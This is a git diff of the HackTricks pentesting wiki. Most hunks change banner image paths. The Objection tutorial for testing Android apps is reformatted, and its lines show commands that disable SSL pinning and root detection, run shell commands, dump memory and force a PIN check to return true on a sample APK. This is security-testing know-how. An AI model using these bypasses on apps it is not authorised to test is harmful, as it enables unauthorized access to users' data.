diff --git a/.gitbook/assets/image (1) (1) (2).png b/.gitbook/assets/image (1) (1) (2).png new file mode 100644 index 00000000..847a8c4e Binary files /dev/null and b/.gitbook/assets/image (1) (1) (2).png differ diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png index 847a8c4e..261b7c00 100644 Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png index 261b7c00..78abb789 100644 Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ diff --git a/.gitbook/assets/image (2) (1) (2).png b/.gitbook/assets/image (2) (1) (2).png new file mode 100644 index 00000000..0f8a8673 Binary files /dev/null and b/.gitbook/assets/image (2) (1) (2).png differ diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png index 0f8a8673..ce61d494 100644 Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png index ce61d494..14a78557 100644 Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (70) (1).png b/.gitbook/assets/image (70) (1).png new file mode 100644 index 00000000..1978dd55 Binary files /dev/null and b/.gitbook/assets/image (70) (1).png differ diff --git a/.gitbook/assets/image (70).png b/.gitbook/assets/image (70).png index 1978dd55..54935ced 100644 Binary files a/.gitbook/assets/image (70).png and b/.gitbook/assets/image (70).png differ diff --git a/.gitbook/assets/image (73) (1).png b/.gitbook/assets/image (73) (1).png new file mode 100644 index 00000000..74a3163d Binary files /dev/null and b/.gitbook/assets/image (73) (1).png differ 
diff --git a/.gitbook/assets/image (73).png b/.gitbook/assets/image (73).png index 74a3163d..619cc354 100644 Binary files a/.gitbook/assets/image (73).png and b/.gitbook/assets/image (73).png differ diff --git a/.gitbook/assets/image (78) (1).png b/.gitbook/assets/image (78) (1).png new file mode 100644 index 00000000..7e07102b Binary files /dev/null and b/.gitbook/assets/image (78) (1).png differ diff --git a/.gitbook/assets/image (78).png b/.gitbook/assets/image (78).png index 7e07102b..e7036425 100644 Binary files a/.gitbook/assets/image (78).png and b/.gitbook/assets/image (78).png differ diff --git a/.gitbook/assets/image (8) (2).png b/.gitbook/assets/image (8) (2).png new file mode 100644 index 00000000..fa756fb5 Binary files /dev/null and b/.gitbook/assets/image (8) (2).png differ diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png index fa756fb5..1982f5d0 100644 Binary files a/.gitbook/assets/image (8).png and b/.gitbook/assets/image (8).png differ diff --git a/.gitbook/assets/image (81) (1).png b/.gitbook/assets/image (81) (1).png new file mode 100644 index 00000000..169a0842 Binary files /dev/null and b/.gitbook/assets/image (81) (1).png differ diff --git a/.gitbook/assets/image (81).png b/.gitbook/assets/image (81).png index 169a0842..37ab1a51 100644 Binary files a/.gitbook/assets/image (81).png and b/.gitbook/assets/image (81).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index 78abb789..64b0c5b0 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/SUMMARY.md b/SUMMARY.md index 2c7bcf7a..6a6f4d7f 100644 --- a/SUMMARY.md +++ b/SUMMARY.md 
@@ -159,6 +159,7 @@ * [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md) * [Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md) * [Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md) + * [Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md) * [Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md) * [AD information in printers](windows-hardening/active-directory-methodology/ad-information-in-printers.md) * [ASREPRoast](windows-hardening/active-directory-methodology/asreproast.md) diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md index 5d8f1d28..6714850d 100644 --- a/forensics/basic-forensic-methodology/linux-forensics.md +++ b/forensics/basic-forensic-methodology/linux-forensics.md @@ -1,7 +1,7 @@ # Linux Forensics {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -168,7 +168,7 @@ ThisisTheMasterSecret ``` {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -233,7 +233,7 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not" ``` {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ 
@@ -376,7 +376,7 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -466,7 +466,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/generic-methodologies-and-resources/brute-force.md b/generic-methodologies-and-resources/brute-force.md index f09534b0..40a2292e 100644 --- a/generic-methodologies-and-resources/brute-force.md +++ b/generic-methodologies-and-resources/brute-force.md @@ -1,7 +1,7 @@ # Brute Force - CheatSheet {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -84,7 +84,7 @@ python3 cupp.py -h * [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ 
@@ -441,7 +441,7 @@ crackmapexec winrm -d -u usernames.txt -p passwords.txt ``` {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -641,7 +641,7 @@ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx ``` {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -808,7 +808,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/generic-methodologies-and-resources/python/README.md b/generic-methodologies-and-resources/python/README.md index b44165c3..051cd226 100644 --- a/generic-methodologies-and-resources/python/README.md +++ b/generic-methodologies-and-resources/python/README.md @@ -1,7 +1,7 @@ # Python Sandbox Escape & Pyscript {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -51,7 +51,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ 
diff --git a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md index 90ed5627..ec167af6 100644 --- a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md +++ b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md @@ -1,7 +1,7 @@ # Bypass Python sandboxes {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -322,7 +322,7 @@ with (a as b): ``` {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -710,7 +710,7 @@ You can check the output of this script in this page: {% endcontent-ref %} {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -1118,7 +1118,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/generic-methodologies-and-resources/python/venv.md b/generic-methodologies-and-resources/python/venv.md index ca990ac7..790417ac 100644 --- a/generic-methodologies-and-resources/python/venv.md +++ b/generic-methodologies-and-resources/python/venv.md 
@@ -1,7 +1,7 @@ # venv {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -62,7 +62,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/generic-methodologies-and-resources/python/web-requests.md b/generic-methodologies-and-resources/python/web-requests.md index a13f0bf2..46334aac 100644 --- a/generic-methodologies-and-resources/python/web-requests.md +++ b/generic-methodologies-and-resources/python/web-requests.md @@ -1,7 +1,7 @@ # Web Requests {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -142,7 +142,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/generic-methodologies-and-resources/search-exploits.md b/generic-methodologies-and-resources/search-exploits.md index c9d79151..9c9e0729 100644 --- a/generic-methodologies-and-resources/search-exploits.md +++ b/generic-methodologies-and-resources/search-exploits.md 
@@ -1,7 +1,7 @@ # Search Exploits {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -85,7 +85,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/linux-hardening/privilege-escalation/docker-breakout/README.md b/linux-hardening/privilege-escalation/docker-breakout/README.md index 492f6cea..a2216061 100644 --- a/linux-hardening/privilege-escalation/docker-breakout/README.md +++ b/linux-hardening/privilege-escalation/docker-breakout/README.md @@ -1,7 +1,7 @@ # Docker Basics & Breakout {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -124,7 +124,7 @@ tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private When I changed Docker host, I had to move the root keys and repository keys to operate from the new host. {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ 
@@ -254,7 +254,7 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration) {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -397,7 +397,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../../.gitbook/assets/image.png) +![](<../../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/linux-hardening/useful-linux-commands/README.md b/linux-hardening/useful-linux-commands/README.md index 947aeed7..54553cf8 100644 --- a/linux-hardening/useful-linux-commands/README.md +++ b/linux-hardening/useful-linux-commands/README.md @@ -1,7 +1,7 @@ # Useful Linux Commands {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -148,7 +148,7 @@ sudo chattr -i file.txt #Remove the bit so you can delete it ``` {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ 
@@ -327,7 +327,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md index 9558b48b..5bf00826 100644 --- a/mobile-pentesting/android-app-pentesting/README.md +++ b/mobile-pentesting/android-app-pentesting/README.md @@ -1,7 +1,7 @@ # Android Applications Pentesting {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -63,7 +63,7 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk ``` {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -246,7 +246,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains {% endcontent-ref %} {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ 
@@ -496,7 +496,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b * [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -687,7 +687,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3 ### [MARA Framework](https://github.com/xtiankisutsa/MARA\_Framework) -![](<../../.gitbook/assets/image (81).png>) +![](<../../.gitbook/assets/image (81) (1).png>) **MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. It is a tool that puts together commonly used mobile application reverse engineering and analysis tools, to assist in testing mobile applications against the OWASP mobile security threats. Its objective is to make this task easier and friendlier to mobile application developers and security professionals. @@ -705,7 +705,7 @@ It is able to: Useful to detect malware: [https://koodous.com/](https://koodous.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -802,7 +802,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../../.gitbook/assets/image.png) +![](<../../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ 
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md index 9e9fe788..2e32bf17 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md @@ -1,4 +1,4 @@ - +# Objection Tutorial
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# **Introduction** +## **Introduction** [![objection](https://github.com/sensepost/objection/raw/master/images/objection.png)](https://github.com/sensepost/objection) @@ -27,11 +26,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Note:** This is not some form of jailbreak / root bypass. By using `objection`, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing. -## Resume +### Resume The **goal** of **objection** is let the user call the **main actions that offers Frida**. **Otherwise**, the user will need to create a **single script for every application** that he wants to test. -# Tutorial +## Tutorial For this tutorial I am going to use the APK that you can download here: @@ -39,13 +38,13 @@ For this tutorial I am going to use the APK that you can download here: Or from its [original repository ](https://github.com/asvid/FridaApp)(download app-release.apk) -## Installation +### Installation ``` pip3 install objection ``` -## Connection +### Connection Make a **regular ADB conection** and **start** the **frida** server in the device (and check that frida is working in both the client and the server). @@ -55,11 +54,11 @@ If you are using a **rooted device** it is needed to select the application that objection --gadget asvid.github.io.fridaapp explore ``` -## Basic Actions +### Basic Actions Not all possible commands of objections are going to be listed in this tutorial, only the ones that I have found more useful. -### Environment +#### Environment Some interesting information (like passwords or paths) could be find inside the environment. @@ -69,7 +68,7 @@ env ![](<../../../.gitbook/assets/image (64).png>) -### Frida Information +#### Frida Information ``` frida 
@@ -77,58 +76,58 @@ frida ![](<../../../.gitbook/assets/image (65).png>) -### Upload/Download +#### Upload/Download ```bash file download [] file upload [] ``` -### Import frida script +#### Import frida script ```bash import ``` -### SSLPinning +#### SSLPinning ```bash android sslpinning disable #Attempts to disable SSL Pinning on Android devices. ``` -### Root detection +#### Root detection ```bash android root disable #Attempts to disable root detection on Android devices. android root simulate #Attempts to simulate a rooted Android environment. ``` -### Exec Command +#### Exec Command ```bash android shell_exec whoami ``` -### Screenshots +#### Screenshots ```bash android ui screenshot /tmp/screenshot android ui FLAG_SECURE false #This may enable you to take screenshots using the hardware keys ``` -## Static analysis made Dynamic +### Static analysis made Dynamic In a real application we should know all of the information discovered in this part before using objection thanks to **static analysis**. Anyway, this way maybe you can see **something new** as here you will only have a complete list of classes, methods and exported objects. This is also usefull if somehow you are **unable to get some readable source code** of the app. -### List activities, receivers and services +#### List activities, receivers and services ``` android hooking list activities ``` -![](<../../../.gitbook/assets/image (78).png>) +![](<../../../.gitbook/assets/image (78) (1).png>) ``` android hooking list services @@ -137,15 +136,15 @@ android hooking list receivers Frida will launch an error if none is found -### Getting current activity +#### Getting current activity ``` android hooking get current_activity ``` -![](<../../../.gitbook/assets/image (73).png>) +![](<../../../.gitbook/assets/image (73) (1).png>) -### Search Classes +#### Search Classes Lets start looking for classes inside our application 
@@ -155,7 +154,7 @@ android hooking search classes asvid.github.io.fridaapp ![](<../../../.gitbook/assets/image (69).png>) -### Search Methods of a class +#### Search Methods of a class Now lets extract the methods inside the class _MainActivity:_ @@ -163,9 +162,9 @@ Now lets extract the methods inside the class _MainActivity:_ android hooking search methods asvid.github.io.fridaapp MainActivity ``` -![](<../../../.gitbook/assets/image (70).png>) +![](<../../../.gitbook/assets/image (70) (1).png>) -### List declared Methods of a class with their parameters +#### List declared Methods of a class with their parameters Lets figure out wich parameters does the methods of the class need: @@ -175,7 +174,7 @@ android hooking list class_methods asvid.github.io.fridaapp.MainActivity ![](<../../../.gitbook/assets/image (79).png>) -### List classes +#### List classes You could also list all the classes that were loaded inside the current applicatoin: @@ -185,9 +184,9 @@ android hooking list classes #List all loaded classes, As the target application This is very useful if you want to **hook the method of a class and you only know the name of the class**. You coul use this function to **search which module owns the class** and then hook its method. -## Hooking being easy +### Hooking being easy -### Hooking (watching) a method +#### Hooking (watching) a method From the [source code](https://github.com/asvid/FridaApp/blob/master/app/src/main/java/asvid/github/io/fridaapp/MainActivity.kt) of the application we know that the **function** _**sum()**_ **from** _**MainActivity**_ is being run **every second**. Lets try to **dump all possible information** each time the function is called (arguments, return value and backtrace): 
@@ -197,7 +196,7 @@ android hooking watch class_method asvid.github.io.fridaapp.MainActivity.sum --d ![](<../../../.gitbook/assets/image (71).png>) -### Hooking (watching) an entire class +#### Hooking (watching) an entire class Actually I find all the methods of the class MainActivity really interesting, lets **hook them all**. Be careful, this could **crash** an application. @@ -209,7 +208,7 @@ If you play with the application while the class is hooked you will see when **e ![](<../../../.gitbook/assets/image (72).png>) -### Changing boolean return value of a function +#### Changing boolean return value of a function From the source code you can see that the function _checkPin_ gets a _String_ as argument and returns a _boolean_. Lets make the function **always return true**: @@ -219,7 +218,7 @@ Now, If you write anything in the text box for the PIN code you will see tat any ![](<../../../.gitbook/assets/image (77).png>) -## Class instances +### Class instances Search for and print **live instances of a specific Java class**, specified by a fully qualified class name. Out is the result of an attempt at getting a string value for a discovered objection which would typically **contain property values for the object**. @@ -229,7 +228,7 @@ android heap print_instances ![](<../../../.gitbook/assets/image (80).png>) -## Keystore/Intents +### Keystore/Intents You can play with the keystore and intents using: @@ -239,16 +238,16 @@ android intents launch_activity android intent launch_service ``` -## Memory +### Memory -### Dump +#### Dump ```bash memory dump all #Dump all memory memory dump from_base #Dump a part ``` -### List +#### List ``` memory list modules @@ -264,7 +263,7 @@ Lets checks what is frida exporting: ![](<../../../.gitbook/assets/image (68).png>) -### Search/Write +#### Search/Write You can alse search and write inside memory with objection: @@ -273,23 +272,22 @@ memory search "" (--string) (--offsets-only) memory write "
" "" (--string) ``` -## SQLite +### SQLite You cals can use the command `sqlite` to interact with sqlite databases. -## Exit +### Exit ``` exit ``` -# What I miss in Objection +## What I miss in Objection * The hooking methods sometimes crashes the application (this is also because of Frida). * You can't use the instaces of the classes to call functions of the instance. And you can't create new instances of classes and use them to call functions. * There isn't a shortcut (like the one for sslpinnin) to hook all the common crypto methods being used by the application to see cyphered text, plain text, keys, IVs and algorithms used. -
Support HackTricks and get benefits! @@ -305,5 +303,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/mobile-pentesting/android-checklist.md b/mobile-pentesting/android-checklist.md index 2b356bd2..ad6e6f29 100644 --- a/mobile-pentesting/android-checklist.md +++ b/mobile-pentesting/android-checklist.md @@ -1,7 +1,7 @@ # Android APK Checklist {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -97,7 +97,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/network-services-pentesting/8086-pentesting-influxdb.md b/network-services-pentesting/8086-pentesting-influxdb.md index b28a4a85..890af3cf 100644 --- a/network-services-pentesting/8086-pentesting-influxdb.md +++ b/network-services-pentesting/8086-pentesting-influxdb.md @@ -1,7 +1,7 @@ # 8086 - Pentesting InfluxDB {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -164,7 +164,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md index af5d6e0a..bc9c782a 100644 --- a/network-services-pentesting/pentesting-postgresql.md 
+++ b/network-services-pentesting/pentesting-postgresql.md @@ -1,7 +1,7 @@ # 5432,5433 - Pentesting Postgresql {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -99,7 +99,7 @@ ORDER BY 1; ``` {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -179,7 +179,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/pentesting-web/command-injection.md b/pentesting-web/command-injection.md index eb3e7b95..e83c6f3d 100644 --- a/pentesting-web/command-injection.md +++ b/pentesting-web/command-injection.md @@ -1,7 +1,7 @@ # Command Injection {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -101,7 +101,7 @@ Here are the top 25 parameters that could be vulnerable to code injection and si ``` {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ 
@@ -187,7 +187,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/pentesting-web/email-header-injection.md b/pentesting-web/email-header-injection.md index 251673a1..a27ca9f9 100644 --- a/pentesting-web/email-header-injection.md +++ b/pentesting-web/email-header-injection.md @@ -1,7 +1,7 @@ # Email Injections {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -118,7 +118,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ diff --git a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md index d1e86e78..980befc9 100644 --- a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md +++ b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md @@ -285,7 +285,7 @@ In this case the attacker **won't receive the response timeout until he has sen Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here: -
+
There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours. diff --git a/pentesting-web/nosql-injection.md b/pentesting-web/nosql-injection.md index f50feacb..2f2fff69 100644 --- a/pentesting-web/nosql-injection.md +++ b/pentesting-web/nosql-injection.md @@ -1,7 +1,7 @@ # NoSQL injection {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -121,7 +121,7 @@ Using the **$func** operator of the [MongoLite](https://github.com/agentejo/cock ![](<../.gitbook/assets/image (468).png>) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ @@ -272,7 +272,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -![](../.gitbook/assets/image.png) +![](<../.gitbook/assets/image (1).png>) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most 